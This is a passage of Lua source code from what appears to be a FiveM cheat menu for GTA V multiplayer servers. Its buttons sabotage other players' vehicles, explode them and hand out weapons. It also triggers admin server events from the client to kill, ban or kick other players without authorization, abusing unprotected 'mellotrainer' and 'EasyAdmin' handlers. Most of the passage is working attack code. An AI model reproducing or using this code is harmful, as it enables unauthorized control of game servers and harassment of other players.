  9154. elseif TiagoMenu.Button("~h~~b~--Vehicle Options--") then
  9155. elseif TiagoMenu.Button("~b~Kick Vehicle") then
  9156. ClearPedTasksImmediately(GetPlayerPed(SelectedPlayer))
  9157. elseif TiagoMenu.Button("~b~Fuck Engine ~r~NEW") then
  9158. local playerPed = GetPlayerPed(SelectedPlayer)
  9159. NetworkRequestControlOfEntity(GetVehiclePedIsIn(SelectedPlayer))
  9160. SetVehicleUndriveable(GetVehiclePedIsIn(playerPed),true)
  9161. SetVehicleEngineHealth(GetVehiclePedIsIn(playerPed), 100)
  9163. elseif TiagoMenu.Button("~b~Repair Vehicle ~r~NEW") then
  9164. NetworkRequestControlOfEntity(GetVehiclePedIsIn(SelectedPlayer))
  9165. SetVehicleFixed(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false))
  9166. SetVehicleDirtLevel(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), 0.0)
  9167. SetVehicleLights(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), 0)
  9168. SetVehicleBurnout(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), false)
  9169. Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), 0)
  9171. elseif TiagoMenu.Button("~b~Fuck Car ~r~NEW ") then
  9172. local playerPed = GetPlayerPed(SelectedPlayer)
  9173. local playerVeh = GetVehiclePedIsIn(playerPed, true)
  9174. NetworkRequestControlOfEntity(GetVehiclePedIsIn(SelectedPlayer))
  9175. StartVehicleAlarm(playerVeh)
  9176. DetachVehicleWindscreen(playerVeh)
  9177. SmashVehicleWindow(playerVeh, 0)
  9178. SmashVehicleWindow(playerVeh, 1)
  9179. SmashVehicleWindow(playerVeh, 2)
  9180. SmashVehicleWindow(playerVeh, 3)
  9181. SetVehicleTyreBurst(playerVeh, 0, true, 1000.0)
  9182. SetVehicleTyreBurst(playerVeh, 1, true, 1000.0)
  9183. SetVehicleTyreBurst(playerVeh, 2, true, 1000.0)
  9184. SetVehicleTyreBurst(playerVeh, 3, true, 1000.0)
  9185. SetVehicleTyreBurst(playerVeh, 4, true, 1000.0)
  9186. SetVehicleTyreBurst(playerVeh, 5, true, 1000.0)
  9187. SetVehicleTyreBurst(playerVeh, 4, true, 1000.0)
  9188. SetVehicleTyreBurst(playerVeh, 7, true, 1000.0)
  9189. SetVehicleDoorBroken(playerVeh, 0, true)
  9190. SetVehicleDoorBroken(playerVeh, 1, true)
  9191. SetVehicleDoorBroken(playerVeh, 2, true)
  9192. SetVehicleDoorBroken(playerVeh, 3, true)
  9193. SetVehicleDoorBroken(playerVeh, 4, true)
  9194. SetVehicleDoorBroken(playerVeh, 5, true)
  9195. SetVehicleDoorBroken(playerVeh, 6, true)
  9196. SetVehicleDoorBroken(playerVeh, 7, true)
  9197. SetVehicleLights(playerVeh, 1)
  9198. Citizen.InvokeNative(0x1FD09E7390A74D54, playerVeh, 1)
  9199. SetVehicleNumberPlateTextIndex(playerVeh, 5)
  9200. SetVehicleNumberPlateText(playerVeh, "Tiago")
  9201. SetVehicleDirtLevel(playerVeh, 10.0)
  9202. SetVehicleModColor_1(playerVeh, 1)
  9203. SetVehicleModColor_2(playerVeh, 1)
  9204. SetVehicleCustomPrimaryColour(playerVeh, 255, 51, 255)
  9205. SetVehicleCustomSecondaryColour(playerVeh, 255, 51, 255)
  9206. SetVehicleBurnout(playerVeh, true)
  9207. drawNotification("~g~Vehicle Fucked Up!")
  9208. elseif TiagoMenu.Button("~r~Explode ~b~Vehicle") then
  9209. if IsPedInAnyVehicle(GetPlayerPed(SelectedPlayer), true) then
  9210. AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 18, 1337.0, false, true, 0.0)
  9211. else
  9212. drawNotification(
  9213. '~h~~r~Player not in a vehicle~s~.'
  9214. )
  9215. end
  9216. elseif TiagoMenu.Button("~r~MelloTrainer ~s~KILL") then
  9217. TriggerServerEvent("mellotrainer:s_adminKill", GetPlayerServerId(SelectedPlayer))
  9218. elseif TiagoMenu.Button("~r~MelloTrainer ~s~BAN") then
  9219. local result = KeyboardInput("motivo do ban", "", 100)
  9220. if result then
  9221. TriggerServerEvent( 'mellotrainer:adminTempBan', GetPlayerServerId(SelectedPlayer),result)
  9222. end
  9223. elseif TiagoMenu.Button("~r~MelloTrainer ~s~KICK") then
  9224. local result = KeyboardInput("motivo do kick", "", 100)
  9225. if result then
  9226. TriggerServerEvent( 'mellotrainer:adminKick', GetPlayerServerId(SelectedPlayer), result)
  9227. TriggerServerEvent("EasyAdmin:kickPlayer", GetPlayerServerId(SelectedPlayer), result)
  9228. end
  9229. end
  9232. TiagoMenu.Display()
  9233. elseif TiagoMenu.IsMenuOpened("SingleWepPlayer") then
  9234. for i = 1, #allWeapons do
  9235. if TiagoMenu.Button(allWeapons[i]) then
  9236. GiveWeaponToPed(GetPlayerPed(SelectedPlayer), GetHashKey(allWeapons[i]), 1000, false, true)
  9237. end
  9238. end
  9240. TiagoMenu.Display()
  9241. elseif IsControlJustReleased(0, 157) then
  9242. TeleportToWaypoint()
  9243. elseif IsControlJustReleased(0, 158) then
  9244. fixcar()
  9245. elseif IsDisabledControlPressed(0, 256) then
  9246. TiagoMenu.OpenMenu("MainMenu")
  9247. TiagoMenu.Display()
  9248. elseif IsDisabledControlPressed(0, 344) then
  9249. TiagoMenu.OpenMenu("MainMenu")
  9250. end
  9251. Citizen.Wait(0)
  9252. end
  9253. end
  9254. )
  9256. if ForceMap then
  9257. DisplayRadar(true)
  9258. end
  9261. RegisterCommand("killmenu", function(source,args,raw)
  9262. Enabled = false
  9263. end, false)
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